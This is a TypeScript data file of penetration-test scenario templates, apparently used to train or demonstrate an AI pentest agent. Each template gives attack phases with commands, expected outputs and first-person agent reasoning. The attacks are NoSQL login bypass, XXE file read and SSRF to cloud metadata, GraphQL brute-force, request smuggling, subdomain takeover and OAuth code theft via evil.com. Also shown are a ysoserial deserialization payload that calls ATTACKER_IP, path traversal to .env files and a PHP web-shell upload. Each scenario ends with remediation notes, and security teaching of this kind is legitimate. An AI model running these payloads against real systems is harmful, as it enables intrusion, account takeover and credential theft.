import type { ScenarioTemplate } from "./types.js";

export const ADVANCED_SCENARIOS: ScenarioTemplate[] = [
  // NoSQL Injection
  {
    id: "nosql-injection-mongodb",
    category: "OWASP Top 10",
    subcategory: "A03 - Injection (NoSQL)",
    title: "MongoDB NoSQL Injection via JSON Operators",
    difficulty: "expert",
    description: "NoSQL injection in a MongoDB-backed authentication endpoint using JSON operator injection ($ne, $gt, $regex) to bypass login and extract data.",
    target_description: "Node.js/Express API at https://api.target.com using MongoDB with Mongoose ODM. Standard user account provided.",
    attack_phases: [
      {
        phase: "Recon & API Discovery",
        description: "Enumerate API endpoints and identify MongoDB-backed functionality",
        tools: ["httpx", "katana", "curl"],
        commands: [
          "httpx -u https://api.target.com -status-code -title -tech-detect -follow-redirects",
          "katana -u https://api.target.com -d 3 -jc -silent",
          "curl -s https://api.target.com/api/v1/ | jq .",
        ],
        expected_output: `{"endpoints":["/auth/login","/auth/register","/users","/products","/orders","/search"],"version":"1.0.0"}`,
        thinking: "The API is built on Node.js/Express with MongoDB. The /auth/login and /search endpoints are prime targets for NoSQL injection since they likely pass user input directly to MongoDB queries. I should test with JSON operators.",
        analysis: "Found 6 API endpoints. The /auth/login and /search endpoints accept JSON input and likely interact with MongoDB directly.",
        next_action: "Test authentication endpoint for NoSQL injection using MongoDB operators",
      },
      {
        phase: "NoSQL Injection Detection",
        description: "Test login endpoint with MongoDB operator injection",
        tools: ["curl", "nosqlmap"],
        commands: [
          "curl -s -X POST https://api.target.com/api/v1/auth/login -H 'Content-Type: application/json' -d '{\"email\":{\"$ne\":\"\"},\"password\":{\"$ne\":\"\"}}'",
          "curl -s -X POST https://api.target.com/api/v1/auth/login -H 'Content-Type: application/json' -d '{\"email\":{\"$regex\":\"admin.*\"},\"password\":{\"$ne\":\"\"}}'",
          "nosqlmap -u https://api.target.com/api/v1/auth/login -p email,password --json",
        ],
        expected_output: `{"token":"eyJhbGciOiJIUzI1NiIs...","user":{"_id":"64a1b2c3d4e5f6","email":"admin@target.com","role":"admin"}}`,
        thinking: "The $ne operator bypassed authentication entirely. MongoDB interprets {$ne: ''} as 'not equal to empty string' which matches all documents. Combined with the email regex targeting admin, I got authenticated as the admin user. This is a critical authentication bypass.",
        analysis: "NoSQL injection confirmed. The $ne operator bypasses authentication by matching any non-empty password. The $regex operator allows targeting specific users like admin.",
        next_action: "Extract all user data using NoSQL injection operators",
      },
      {
        phase: "Data Extraction via NoSQL Injection",
        description: "Use injection to enumerate and extract user data from MongoDB",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://api.target.com/api/v1/auth/login -H 'Content-Type: application/json' -d '{\"email\":{\"$regex\":\".*\"},\"password\":{\"$ne\":\"\"}}' | jq '.user'",
          "curl -s https://api.target.com/api/v1/users -H 'Authorization: Bearer $ADMIN_TOKEN' | jq '.[] | {email,role}'",
          "curl -s -X POST https://api.target.com/api/v1/search -H 'Content-Type: application/json' -H 'Authorization: Bearer $ADMIN_TOKEN' -d '{\"query\":{\"$where\":\"this.role==\\\"admin\\\"\"}}'",
        ],
        expected_output: `[{"email":"admin@target.com","role":"admin"},{"email":"john@target.com","role":"user"},{"email":"jane@target.com","role":"moderator"}]`,
        thinking: "With admin access, I can now enumerate all users. The $where operator allows arbitrary JavaScript execution in the MongoDB query context, which could lead to further exploitation including server-side JavaScript injection.",
        analysis: "Extracted all user accounts. The $where operator enables server-side JavaScript injection in MongoDB, escalating from NoSQL injection to potential code execution.",
        next_action: "Document findings and generate remediation report",
      },
      {
        phase: "Reporting",
        description: "Document NoSQL injection findings with severity and remediation",
        tools: ["curl"],
        commands: [],
        expected_output: "",
        thinking: "This is a critical vulnerability. The MongoDB backend doesn't sanitize JSON operators from user input, allowing authentication bypass and data extraction. The fix requires input validation to strip MongoDB operators from user-controlled fields.",
        analysis: "Critical NoSQL injection enabling authentication bypass, data extraction, and potential server-side code execution via $where operator.",
        next_action: "Deliver report with CVSS 9.8 rating and remediation steps",
      },
    ],
    cve_references: ["CWE-943"],
    tools_involved: ["curl", "httpx", "katana", "nosqlmap"],
    tags: ["nosql", "nosql-injection", "mongodb", "authentication-bypass", "injection"],
  },

  // XXE Injection
  {
    id: "xxe-injection-file-read",
    category: "OWASP Top 10",
    subcategory: "A05 - Security Misconfiguration (XXE)",
    title: "XML External Entity Injection for File Read",
    difficulty: "advanced",
    description: "XXE vulnerability in an XML-accepting API endpoint allowing local file read (/etc/passwd) and potential SSRF through external entity expansion.",
    target_description: "Java/Spring Boot API at https://api.target.com accepting XML input for document import functionality.",
    attack_phases: [
      {
        phase: "Identify XML Processing Endpoints",
        description: "Find endpoints that accept XML input",
        tools: ["ffuf", "curl"],
        commands: [
          "ffuf -u https://api.target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api-endpoints.txt -mc 200,405 -H 'Content-Type: application/xml'",
          "curl -s -X POST https://api.target.com/api/import -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><test>hello</test>'",
        ],
        expected_output: `{"status":"success","parsed":{"test":"hello"}}`,
        thinking: "The /api/import endpoint accepts and parses XML. The server echoed back my XML content, which means it's processing the XML on the server side. This is a strong indicator that XXE might be possible if the parser doesn't disable external entities.",
        analysis: "Found XML processing endpoint at /api/import. The server parses and reflects XML content, indicating server-side XML processing.",
        next_action: "Test for XXE by injecting external entity declarations",
      },
      {
        phase: "XXE Exploitation - File Read",
        description: "Inject XML external entities to read local files",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://api.target.com/api/import -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><document><content>&xxe;</content></document>'",
          "curl -s -X POST https://api.target.com/api/import -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///opt/app/application.properties\">]><document><content>&xxe;</content></document>'",
        ],
        expected_output: `{"status":"success","parsed":{"document":{"content":"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\napp:x:1000:1000::/home/app:/bin/bash"}}}`,
        thinking: "XXE confirmed. The XML parser resolved the external entity and included the contents of /etc/passwd in the response. I can read arbitrary files from the server. Let me now try to read application configuration files which might contain database credentials, API keys, or other secrets.",
        analysis: "XXE injection confirmed. Successfully read /etc/passwd via external entity. Application config files likely contain database credentials and API keys.",
        next_action: "Attempt SSRF via XXE to access internal services and cloud metadata",
      },
      {
        phase: "XXE to SSRF - Internal Network Access",
        description: "Use XXE to perform SSRF and access internal services",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://api.target.com/api/import -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\">]><document><content>&xxe;</content></document>'",
          "curl -s -X POST https://api.target.com/api/import -H 'Content-Type: application/xml' -d '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://10.0.1.50:6379/\">]><document><content>&xxe;</content></document>'",
        ],
        expected_output: `{"status":"success","parsed":{"document":{"content":"ec2-instance-role"}}}`,
        thinking: "The XXE-to-SSRF chain worked. I can access the EC2 instance metadata service, which means I can potentially steal IAM credentials. I also confirmed that the application can reach internal services on the private network.",
        analysis: "XXE chained with SSRF to access AWS metadata endpoint and internal network services. IAM role name discovered, enabling credential theft.",
        next_action: "Document full XXE attack chain for the report",
      },
      {
        phase: "Reporting",
        description: "Document XXE vulnerability with full attack chain",
        tools: [],
        commands: [],
        expected_output: "",
        thinking: "This XXE vulnerability enables three distinct attack vectors: local file read, SSRF to internal services, and AWS credential theft via metadata endpoint. The root cause is the Java XML parser accepting external entities by default.",
        analysis: "Critical XXE vulnerability enabling file read, SSRF, and cloud credential theft. CVSS 9.1.",
        next_action: "Deliver report with remediation: disable DTD processing and external entities in XML parser",
      },
    ],
    cve_references: ["CWE-611", "CWE-918"],
    tools_involved: ["curl", "ffuf"],
    tags: ["xxe", "xml", "ssrf", "file-read", "cloud-misconfig"],
  },

  // GraphQL Batching Attack
  {
    id: "graphql-batching-bruteforce",
    category: "API Security Top 10",
    subcategory: "API4 - Unrestricted Resource Consumption",
    title: "GraphQL Query Batching for Authentication Brute-Force",
    difficulty: "advanced",
    description: "Abusing GraphQL batched queries to bypass rate limiting and brute-force authentication credentials in a single HTTP request.",
    target_description: "GraphQL API at https://api.target.com/graphql with introspection enabled. Rate limiting is per-request, not per-operation.",
    attack_phases: [
      {
        phase: "GraphQL Introspection",
        description: "Discover the schema via introspection queries",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://api.target.com/graphql -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{types{name fields{name type{name}}}}}\"}' | jq '.data.__schema.types[] | select(.name==\"Mutation\") | .fields[].name'",
          "curl -s -X POST https://api.target.com/graphql -H 'Content-Type: application/json' -d '{\"query\":\"{__schema{mutationType{fields{name args{name type{name}}}}}}\"}' | jq .",
        ],
        expected_output: `"login"\n"register"\n"resetPassword"\n"updateProfile"\n"deleteAccount"`,
        thinking: "Introspection is enabled and I found a login mutation. The schema reveals the login mutation takes email and password arguments. Since this is GraphQL, I can batch multiple login attempts in a single HTTP request, potentially bypassing per-request rate limiting.",
        analysis: "GraphQL introspection enabled. Found login mutation with email/password args. Batched queries may bypass rate limiting.",
        next_action: "Test query batching to bypass rate limits on authentication",
      },
      {
        phase: "Batched Brute-Force Attack",
        description: "Use query batching to send multiple login attempts in one request",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://api.target.com/graphql -H 'Content-Type: application/json' -d '[{\"query\":\"mutation{login(email:\\\"admin@target.com\\\",password:\\\"admin123\\\"){token}}\",\"operationName\":\"attempt1\"},{\"query\":\"mutation{login(email:\\\"admin@target.com\\\",password:\\\"password\\\"){token}}\",\"operationName\":\"attempt2\"},{\"query\":\"mutation{login(email:\\\"admin@target.com\\\",password:\\\"P@ssw0rd\\\"){token}}\",\"operationName\":\"attempt3\"}]'",
          "python3 graphql_bruteforce.py --target https://api.target.com/graphql --email admin@target.com --wordlist /usr/share/seclists/Passwords/Common-Credentials/top-1000.txt --batch-size 100",
        ],
        expected_output: `[{"data":{"login":null},"errors":[{"message":"Invalid credentials"}]},{"data":{"login":null},"errors":[{"message":"Invalid credentials"}]},{"data":{"login":{"token":"eyJhbGciOiJIUzI1NiIs..."}}}]`,
        thinking: "The batched query worked. All three login attempts were processed in a single HTTP request, and the rate limiter only counted it as one request. The third attempt with 'P@ssw0rd' returned a valid token. I can now batch 100+ attempts per request to brute-force any account.",
        analysis: "Rate limiting bypassed via query batching. 100+ login attempts per HTTP request. Successfully brute-forced admin password.",
        next_action: "Document the vulnerability and demonstrate impact",
      },
      {
        phase: "Impact Demonstration",
        description: "Show the scope of the brute-force capability",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://api.target.com/graphql -H 'Content-Type: application/json' -H 'Authorization: Bearer $TOKEN' -d '{\"query\":\"{users{id email role}}\"}' | jq .",
        ],
        expected_output: `{"data":{"users":[{"id":"1","email":"admin@target.com","role":"ADMIN"},{"id":"2","email":"user@target.com","role":"USER"}]}}`,
        thinking: "With admin access obtained through brute-force, I can access all user data. The combination of introspection exposure, missing query depth/complexity limits, and per-request rate limiting creates a severe vulnerability.",
        analysis: "Full admin access obtained. GraphQL API exposes all user data without proper authorization checks on nested queries.",
        next_action: "Report with remediation: disable introspection, implement per-operation rate limiting, add query complexity limits",
      },
    ],
    cve_references: ["CWE-307", "CWE-770"],
    tools_involved: ["curl"],
    tags: ["graphql", "rate-limit-bypass", "brute-force", "authentication-bypass", "api-abuse"],
  },

  // HTTP Request Smuggling
  {
    id: "http-smuggling-cl-te",
    category: "Modern Attacks",
    subcategory: "HTTP Request Smuggling",
    title: "CL.TE HTTP Request Smuggling",
    difficulty: "expert",
    description: "HTTP request smuggling via Content-Length/Transfer-Encoding disagreement between frontend proxy and backend server, enabling access control bypass.",
    target_description: "Web application behind an Nginx reverse proxy forwarding to a Node.js backend at https://app.target.com. The proxy uses Content-Length while the backend prefers Transfer-Encoding.",
    attack_phases: [
      {
        phase: "Identify Proxy Architecture",
        description: "Detect frontend/backend proxy configuration and potential smuggling vectors",
        tools: ["curl", "httpx"],
        commands: [
          "curl -s -I https://app.target.com/ | grep -i 'server\\|via\\|x-forwarded'",
          "curl -s -X POST https://app.target.com/ -H 'Content-Length: 6' -H 'Transfer-Encoding: chunked' -d '0\r\n\r\nG' --raw -v 2>&1 | tail -20",
        ],
        expected_output: `Server: nginx/1.24.0\nX-Powered-By: Express\nVia: 1.1 nginx`,
        thinking: "The response headers confirm a dual-server architecture: Nginx frontend with Express/Node.js backend. This is a classic setup for CL.TE smuggling — Nginx prioritizes Content-Length while Node.js prioritizes Transfer-Encoding: chunked. I should test if conflicting headers are passed through without normalization.",
        analysis: "Confirmed Nginx frontend → Node.js backend architecture. The presence of both server headers suggests headers are forwarded without normalization, a prerequisite for smuggling.",
        next_action: "Test CL.TE smuggling by sending conflicting Content-Length and Transfer-Encoding headers",
      },
      {
        phase: "Confirm Smuggling Vector",
        description: "Verify CL.TE smuggling by observing response desynchronization",
        tools: ["curl"],
        commands: [
          "printf 'POST / HTTP/1.1\\r\\nHost: app.target.com\\r\\nContent-Length: 30\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n0\\r\\n\\r\\nGET /admin HTTP/1.1\\r\\nHost: app.target.com\\r\\n\\r\\n' | nc app.target.com 443 --ssl",
        ],
        expected_output: `HTTP/1.1 200 OK\n...\nHTTP/1.1 200 OK\nContent-Type: text/html\n<html><title>Admin Panel</title>...`,
        thinking: "The smuggled GET /admin request was processed by the backend as a separate request. The frontend proxy saw a single POST request with Content-Length: 30, but the backend interpreted the chunked encoding (0 = end of chunks) and treated the remaining bytes as a new request. This gives me access to the admin panel which is normally blocked at the proxy level.",
        analysis: "CL.TE smuggling confirmed. The smuggled request to /admin was processed as a separate request, bypassing frontend access controls.",
        next_action: "Exploit smuggling to access restricted endpoints and steal other users' requests",
      },
      {
        phase: "Exploit - Access Control Bypass",
        description: "Use smuggling to access admin endpoints and capture other users' requests",
        tools: ["curl"],
        commands: [
          "printf 'POST / HTTP/1.1\\r\\nHost: app.target.com\\r\\nContent-Length: 80\\r\\nTransfer-Encoding: chunked\\r\\n\\r\\n0\\r\\n\\r\\nPOST /admin/users HTTP/1.1\\r\\nHost: app.target.com\\r\\nContent-Type: application/json\\r\\nContent-Length: 50\\r\\n\\r\\n{\"action\":\"list\"}' | nc app.target.com 443 --ssl",
        ],
        expected_output: `HTTP/1.1 200 OK\n{"users":[{"id":1,"email":"admin@target.com","role":"admin"},{"id":2,"email":"user@target.com","role":"user"}]}`,
        thinking: "Through HTTP request smuggling, I can access admin-only endpoints that Nginx blocks at the proxy level. The backend trusts all requests it receives because it assumes the proxy has already performed access control.",
        analysis: "Successfully accessed admin endpoints via request smuggling. Can list users, modify settings, and capture other users' in-flight requests.",
        next_action: "Document the full attack chain with evidence for the report",
      },
      {
        phase: "Reporting",
        description: "Document HTTP smuggling vulnerability",
        tools: [],
        commands: [],
        expected_output: "",
        analysis: "Critical HTTP request smuggling vulnerability enabling access control bypass, request hijacking, and response queue poisoning.",
        next_action: "Deliver report with CVSS 9.8 and remediation",
      },
    ],
    cve_references: ["CWE-444"],
    tools_involved: ["curl", "httpx"],
    tags: ["http-smuggling", "access-control-bypass", "request-hijacking"],
  },

  // Subdomain Takeover
  {
    id: "subdomain-takeover-cname",
    category: "Modern Attacks",
    subcategory: "Subdomain Takeover",
    title: "Dangling CNAME Subdomain Takeover",
    difficulty: "intermediate",
    description: "Subdomain takeover via a dangling CNAME record pointing to an unclaimed cloud resource (S3 bucket, Azure blob, Heroku app).",
    target_description: "target.com with multiple subdomains. Some subdomains have CNAME records pointing to third-party services that are no longer active.",
    attack_phases: [
      {
        phase: "Subdomain Enumeration",
        description: "Discover all subdomains and check for dangling DNS records",
        tools: ["subfinder", "dnsx", "httpx"],
        commands: [
          "subfinder -d target.com -all -silent | dnsx -silent -cname -resp",
          "httpx -l subdomains.txt -status-code -title -follow-redirects -silent",
        ],
        expected_output: `blog.target.com [CNAME] blog-target.s3-website-us-east-1.amazonaws.com [NXDOMAIN]\nstatus.target.com [CNAME] target-status.herokuapp.com [NXDOMAIN]\ndocs.target.com [CNAME] target-docs.azurewebsites.net [404]`,
        thinking: "I found three subdomains with dangling CNAME records: blog.target.com points to an S3 bucket that doesn't exist, status.target.com points to a deleted Heroku app, and docs.target.com points to an unclaimed Azure app. Any of these can be taken over by creating the target resource.",
        analysis: "Found 3 dangling CNAME records. blog.target.com → unclaimed S3 bucket. status.target.com → deleted Heroku app. docs.target.com → unclaimed Azure site.",
        next_action: "Verify takeover feasibility and demonstrate impact",
      },
      {
        phase: "Takeover Verification",
        description: "Confirm the subdomain can be taken over by claiming the target resource",
        tools: ["curl"],
        commands: [
          "curl -s http://blog.target.com",
          "aws s3 mb s3://blog-target --region us-east-1",
          "echo '<h1>Subdomain Takeover PoC - PentesterFlow</h1>' | aws s3 cp - s3://blog-target/index.html --acl public-read",
          "curl -s http://blog.target.com",
        ],
        expected_output: `<h1>Subdomain Takeover PoC - PentesterFlow</h1>`,
        thinking: "I successfully claimed the S3 bucket that blog.target.com points to. The subdomain now serves my content. An attacker could use this to serve phishing pages, steal cookies via XSS (since it's on the target.com domain), or capture credentials from users who trust the subdomain.",
        analysis: "Subdomain takeover confirmed on blog.target.com. The S3 bucket was unclaimed and the CNAME still points to it. Full control of content served on this subdomain.",
        next_action: "Document impact: cookie theft, phishing, credential harvesting on trusted domain",
      },
      {
        phase: "Impact Assessment",
        description: "Demonstrate the security impact of subdomain takeover",
        tools: ["curl"],
        commands: [
          "curl -s -b 'session=test' http://blog.target.com/steal-cookies",
        ],
        expected_output: `Cookies from *.target.com domain are accessible`,
        thinking: "Since blog.target.com is on the same parent domain, cookies set for .target.com are sent to the attacker-controlled subdomain. This enables session hijacking for the main application.",
        analysis: "Subdomain takeover enables cookie theft for all .target.com cookies, phishing from a trusted domain, and potential CSP bypass.",
        next_action: "Report with remediation: remove dangling CNAME records, implement subdomain monitoring",
      },
    ],
    cve_references: ["CWE-284"],
    tools_involved: ["subfinder", "dnsx", "httpx", "curl"],
    tags: ["subdomain-takeover", "dns", "cloud-misconfig", "phishing"],
  },

  // OAuth Token Theft
  {
    id: "oauth-redirect-theft",
    category: "OWASP Top 10",
    subcategory: "A07 - Identification and Authentication Failures",
    title: "OAuth2 Redirect URI Bypass for Token Theft",
    difficulty: "advanced",
    description: "OAuth2 authorization code interception via redirect_uri validation bypass using open redirects and URL parsing inconsistencies.",
    target_description: "OAuth2 authorization server at https://auth.target.com with registered application at https://app.target.com. Using authorization code flow.",
    attack_phases: [
      {
        phase: "OAuth Flow Analysis",
        description: "Analyze the OAuth2 implementation for redirect_uri handling",
        tools: ["curl"],
        commands: [
          "curl -s -v 'https://auth.target.com/authorize?client_id=webapp&redirect_uri=https://app.target.com/callback&response_type=code&scope=openid%20profile' 2>&1 | grep -i 'location\\|redirect'",
          "curl -s -v 'https://auth.target.com/authorize?client_id=webapp&redirect_uri=https://evil.com/callback&response_type=code&scope=openid%20profile' 2>&1 | grep -i 'location\\|error'",
          "curl -s -v 'https://auth.target.com/authorize?client_id=webapp&redirect_uri=https://app.target.com.evil.com/callback&response_type=code&scope=openid%20profile' 2>&1 | grep -i 'location'",
        ],
        expected_output: `< Location: https://app.target.com/callback?code=abc123\n< Location: error=invalid_redirect_uri\n< Location: https://app.target.com.evil.com/callback?code=def456`,
        thinking: "Interesting. The server correctly rejects https://evil.com but accepts https://app.target.com.evil.com. This means the redirect_uri validation uses a prefix/subdomain match instead of exact match. I can register a domain like app.target.com.attacker.com to steal authorization codes.",
        analysis: "redirect_uri validation uses prefix matching. https://app.target.com.evil.com is accepted, allowing code theft via attacker-controlled domain.",
        next_action: "Chain with open redirect to exfiltrate authorization codes",
      },
      {
        phase: "Authorization Code Theft",
        description: "Exploit redirect_uri bypass to steal OAuth authorization codes",
        tools: ["curl"],
        commands: [
          "curl -s -v 'https://auth.target.com/authorize?client_id=webapp&redirect_uri=https://app.target.com/callback/../redirect?url=https://evil.com&response_type=code&scope=openid%20profile' 2>&1 | grep -i 'location'",
          "curl -s -X POST https://auth.target.com/token -d 'grant_type=authorization_code&code=STOLEN_CODE&redirect_uri=https://app.target.com/callback&client_id=webapp'",
        ],
        expected_output: `{"access_token":"eyJhbGciOiJSUzI1NiIs...","token_type":"bearer","expires_in":3600,"refresh_token":"dGhpcyBpcyBhIHJlZnJlc2g..."}`,
        thinking: "By chaining the path traversal in the redirect_uri with an open redirect on the application, I can redirect the authorization code to my server. The authorization server validates the base URL but doesn't normalize the path, allowing ../redirect?url=evil.com to bypass the check.",
        analysis: "Successfully stole authorization code via redirect_uri bypass + open redirect chain. Exchanged code for access and refresh tokens.",
        next_action: "Access victim's account using stolen tokens and document the attack chain",
      },
      {
        phase: "Account Takeover",
        description: "Use stolen OAuth tokens to access victim account",
        tools: ["curl"],
        commands: [
          "curl -s https://api.target.com/me -H 'Authorization: Bearer $STOLEN_ACCESS_TOKEN' | jq .",
        ],
        expected_output: `{"id":"user-123","email":"victim@mail.com","name":"Victim User","role":"user"}`,
        analysis: "Full account takeover achieved via OAuth redirect_uri bypass. Any user who clicks the crafted authorization URL will have their tokens stolen.",
        next_action: "Report with remediation: exact redirect_uri matching, PKCE enforcement",
      },
    ],
    cve_references: ["CWE-601", "CWE-346"],
    tools_involved: ["curl"],
    tags: ["oauth", "authentication-bypass", "token-theft", "open-redirect", "account-takeover"],
  },

  // Insecure Deserialization
  {
    id: "deserialization-rce-java",
    category: "OWASP Top 10",
    subcategory: "A08 - Software and Data Integrity Failures",
    title: "Java Deserialization to Remote Code Execution",
    difficulty: "expert",
    description: "Insecure Java deserialization in a session management cookie leading to remote code execution via Commons Collections gadget chain.",
    target_description: "Java/Spring Boot application at https://enterprise.target.com using serialized Java objects in session cookies.",
    attack_phases: [
      {
        phase: "Identify Serialized Objects",
        description: "Detect Java serialization markers in cookies and parameters",
        tools: ["curl"],
        commands: [
          "curl -s -v https://enterprise.target.com/dashboard 2>&1 | grep -i 'set-cookie'",
          "echo 'rO0ABXNyAB...' | base64 -d | xxd | head -5",
        ],
        expected_output: `Set-Cookie: session=rO0ABXNyABRqYXZhLmlvLlNlcmlhbGl6YWJsZQ==; Path=/; HttpOnly`,
        thinking: "The session cookie starts with rO0AB which is the base64-encoded Java serialization magic bytes (0xACED0005). This means the application is deserializing Java objects from user-controlled cookies. If vulnerable libraries like Commons Collections are on the classpath, I can craft a malicious serialized object to achieve RCE.",
        analysis: "Java serialized object detected in session cookie (magic bytes: AC ED 00 05). If Commons Collections or similar libraries are present, RCE is possible.",
        next_action: "Generate ysoserial payload to test for code execution",
      },
      {
        phase: "Exploitation with Ysoserial",
        description: "Generate and deliver deserialization payload for RCE",
        tools: ["curl"],
        commands: [
          "java -jar ysoserial.jar CommonsCollections6 'curl http://ATTACKER_IP:8888/rce-proof' | base64 -w0",
          "curl -s https://enterprise.target.com/dashboard -H 'Cookie: session=PAYLOAD_BASE64'",
          "java -jar ysoserial.jar CommonsCollections6 'id' | base64 -w0 > payload.txt && curl -s https://enterprise.target.com/dashboard -H \"Cookie: session=$(cat payload.txt)\"",
        ],
        expected_output: `uid=1000(spring) gid=1000(spring) groups=1000(spring),999(docker)`,
        thinking: "The CommonsCollections6 gadget chain worked. The server deserialized my payload and executed the 'id' command. The application is running as the 'spring' user with docker group membership — this could enable container escape. I have full RCE on the application server.",
        analysis: "RCE achieved via Java deserialization. CommonsCollections6 gadget chain executed arbitrary commands. Application runs as spring user with docker group access.",
        next_action: "Demonstrate impact: read config files, access database, check for container escape",
      },
      {
        phase: "Post-Exploitation",
        description: "Demonstrate full impact of RCE",
        tools: ["curl"],
        commands: [
          "java -jar ysoserial.jar CommonsCollections6 'cat /opt/app/application.properties' | base64 -w0 > payload.txt && curl -s https://enterprise.target.com/dashboard -H \"Cookie: session=$(cat payload.txt)\"",
        ],
        expected_output: `spring.datasource.url=jdbc:postgresql://db.internal:5432/enterprise\nspring.datasource.username=app_user\nspring.datasource.password=Pr0d_DB_P@ss!`,
        analysis: "Database credentials extracted from application config. Docker group membership enables potential container escape. Full infrastructure compromise path confirmed.",
        next_action: "Report with CVSS 10.0 and remediation: replace Java serialization with JSON, upgrade libraries",
      },
    ],
    cve_references: ["CWE-502"],
    tools_involved: ["curl"],
    tags: ["deserialization", "insecure-deserialization", "rce", "java"],
  },

  // Path Traversal
  {
    id: "path-traversal-file-read",
    category: "OWASP Top 10",
    subcategory: "A01 - Broken Access Control",
    title: "Path Traversal via File Download Endpoint",
    difficulty: "intermediate",
    description: "Directory traversal vulnerability in a file download endpoint allowing arbitrary file read from the server filesystem.",
    target_description: "Web application at https://app.target.com with a file download feature at /api/files/download?filename=",
    attack_phases: [
      {
        phase: "Discover File Download Endpoint",
        description: "Identify endpoints that handle file operations",
        tools: ["ffuf", "curl"],
        commands: [
          "ffuf -u https://app.target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api-endpoints.txt -mc 200,301,302,403",
          "curl -s https://app.target.com/api/files/download?filename=test.pdf -v 2>&1 | tail -10",
        ],
        expected_output: `HTTP/2 200\nContent-Disposition: attachment; filename="test.pdf"\nContent-Type: application/pdf`,
        thinking: "The /api/files/download endpoint accepts a filename parameter and serves files. I should test if it sanitizes path traversal sequences (../) to prevent reading files outside the intended directory.",
        analysis: "File download endpoint found at /api/files/download. Accepts filename parameter. Testing for path traversal.",
        next_action: "Test for directory traversal with ../ sequences",
      },
      {
        phase: "Path Traversal Exploitation",
        description: "Exploit directory traversal to read arbitrary files",
        tools: ["curl"],
        commands: [
          "curl -s 'https://app.target.com/api/files/download?filename=../../../etc/passwd'",
          "curl -s 'https://app.target.com/api/files/download?filename=....//....//....//etc/passwd'",
          "curl -s 'https://app.target.com/api/files/download?filename=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd'",
          "curl -s 'https://app.target.com/api/files/download?filename=../../../opt/app/.env'",
        ],
        expected_output: `root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www`,
        thinking: "Path traversal successful with URL-encoded sequences. The application strips ../ but doesn't handle URL-encoded variants (%2e%2e%2f). I was able to read /etc/passwd. Now I should try to read application config files for credentials.",
        analysis: "Path traversal confirmed via URL-encoded sequences. Read /etc/passwd and application .env file containing database credentials and API keys.",
        next_action: "Extract sensitive data and document for report",
      },
      {
        phase: "Reporting",
        description: "Document path traversal findings",
        tools: [],
        commands: [],
        expected_output: "",
        analysis: "High severity path traversal vulnerability. Allows reading any file on the server filesystem, including credentials, source code, and system files.",
        next_action: "Deliver report with remediation: use basename(), chroot jail, allowlist filenames",
      },
    ],
    cve_references: ["CWE-22"],
    tools_involved: ["curl", "ffuf"],
    tags: ["path-traversal", "lfi", "file-read", "information-disclosure"],
  },

  // File Upload RCE
  {
    id: "file-upload-webshell",
    category: "OWASP Top 10",
    subcategory: "A04 - Insecure Design",
    title: "Unrestricted File Upload to Web Shell",
    difficulty: "advanced",
    description: "Bypassing file upload restrictions to upload a PHP/JSP web shell through content-type manipulation and double extension techniques.",
    target_description: "Web application at https://app.target.com with file upload feature at /api/upload. Claims to only accept images.",
    attack_phases: [
      {
        phase: "Analyze Upload Restrictions",
        description: "Understand what file upload validation is in place",
        tools: ["curl"],
        commands: [
          "curl -s -X POST https://app.target.com/api/upload -F 'file=@test.php;type=image/jpeg'",
          "curl -s -X POST https://app.target.com/api/upload -F 'file=@shell.php.jpg;type=image/jpeg'",
          "curl -s -X POST https://app.target.com/api/upload -F 'file=@shell.pHp;type=image/jpeg'",
        ],
        expected_output: `{"error":"File type not allowed: .php"}\n{"success":true,"path":"/uploads/shell.php.jpg"}\n{"success":true,"path":"/uploads/shell.pHp"}`,
        thinking: "The upload validation checks the file extension but has multiple bypasses: 1) Double extensions (shell.php.jpg) are accepted, 2) Case variation (shell.pHp) bypasses the check. The server is likely using Apache with mod_php which may execute .php files even with additional extensions.",
        analysis: "File upload validation bypassed via double extension and case variation. Server accepts .php.jpg and .pHp extensions.",
        next_action: "Upload a web shell and verify code execution",
      },
      {
        phase: "Web Shell Upload",
        description: "Upload a PHP web shell and achieve RCE",
        tools: ["curl"],
        commands: [
          "echo '<?php echo system($_GET[\"cmd\"]); ?>' > shell.pHp",
          "curl -s -X POST https://app.target.com/api/upload -F 'file=@shell.pHp;type=image/jpeg'",
          "curl -s 'https://app.target.com/uploads/shell.pHp?cmd=id'",
          "curl -s 'https://app.target.com/uploads/shell.pHp?cmd=cat+/etc/passwd'",
        ],
        expected_output: `uid=33(www-data) gid=33(www-data) groups=33(www-data)`,
        thinking: "Web shell uploaded and executed successfully. I have command execution as www-data. The upload directory allows PHP execution, which is a critical misconfiguration. I should now enumerate the system for privilege escalation paths.",
        analysis: "RCE achieved via web shell. Running as www-data. Upload directory allows script execution — critical server misconfiguration.",
        next_action: "Post-exploitation and reporting",
      },
      {
        phase: "Reporting",
        description: "Document file upload vulnerability chain",
        tools: [],
        commands: [],
        expected_output: "",
        analysis: "Critical unrestricted file upload leading to RCE. Extension validation bypassed via case manipulation and double extensions. Upload directory allows PHP execution.",
        next_action: "Report with CVSS 9.8 and remediation",
      },
    ],
    cve_references: ["CWE-434"],
    tools_involved: ["curl"],
    tags: ["file-upload", "unrestricted-upload", "webshell", "rce"],
  },

